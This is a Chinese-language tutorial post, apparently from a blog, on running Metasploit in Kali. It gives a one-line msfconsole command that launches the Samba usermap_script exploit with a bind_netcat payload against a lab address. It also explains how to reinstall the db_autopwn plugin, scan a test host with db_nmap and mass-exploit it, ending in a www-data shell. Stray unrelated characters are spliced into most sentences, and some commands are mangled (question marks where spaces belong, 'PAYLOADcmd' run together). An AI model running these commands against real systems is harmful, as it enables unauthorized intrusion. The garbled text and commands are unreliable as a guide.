1.閱讀老資料的困惑
老資料里一般是根據(jù)BT5整理的,kali里的metasploit比較新,不太一樣淋样,這里整理一下。
a)msfcli被整合進msfconsole的參數(shù)里:
老指令:
#msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat RHOST=192.168.200.129 E
新指令:
#msfconsole?-x?"use?exploit/multi/samba/usermap_script;?set?RHOST 192.168.200.129;?set?PAYLOADcmd/unix/bind_netcat; [set?LHOST IP;] run"
b)msfpayload胁住、msfencode被整合到msfvenom里:
老指令:
msfpayload -l ? ? ? ?#查看所有攻擊載荷
msfencode -l ? ? ? ? #查看所有編碼器
新指令只需一條指令即可:
msfvenom -l payloads,encoders
下圖是msfvenom的參數(shù)說明:
c)db_autopwn自動滲透腳本被刪除
據(jù)說是由于該腳本雖然使?jié)B透傻瓜化趁猴,但是智能不高,并且造成的負載不小彪见,容易被發(fā)現(xiàn)儡司,所以刪掉了。
目前替代的方法是可以使用metasploit的一些自動化插件和腳本余指,但是更好的方法還是自己選擇合適的腳本和載荷捕犬,使負載變小,效率更高酵镜。
https://github.com/rapid7/metasploit-framework/tree/master/plugins
2.db_autopwn傻瓜化測試
雖然db_autopwn被刪掉了碉碉,但是可以手工恢復(fù)。
https://github.com/PsychoSpy/metasploit-framework/blob/autopwn-modules/plugins/db_autopwn.rb
源代碼復(fù)制下來淮韭,保存為db_autopwn.rb文件垢粮,復(fù)制到/usr/share/metasploit-framwork/plugins/中,然后執(zhí)行加載
#msf>load db_autopwn
滲透測試:
a)掃描測試機
#msf>db_nmap -v -A 192.168.200.129
--測試機的掃描結(jié)果會自動存放如Postgresql數(shù)據(jù)庫中
b)查看掃描結(jié)果
c)自動測試
#msf>db_autopwn -t -p -r -e?? ? ? ?? ----負載不小靠粪,1000多個腳本都會跑一遍蜡吧,需要不少時間毫蚓,好在成功了一個session。
d)連接會話并測試
會話連接已經(jīng)成功斩跌,但user是www-data(敲錯的指令绍些,請自動忽略),不是root耀鸦,沒關(guān)系柬批,至少證明db_autopwn還是管用的。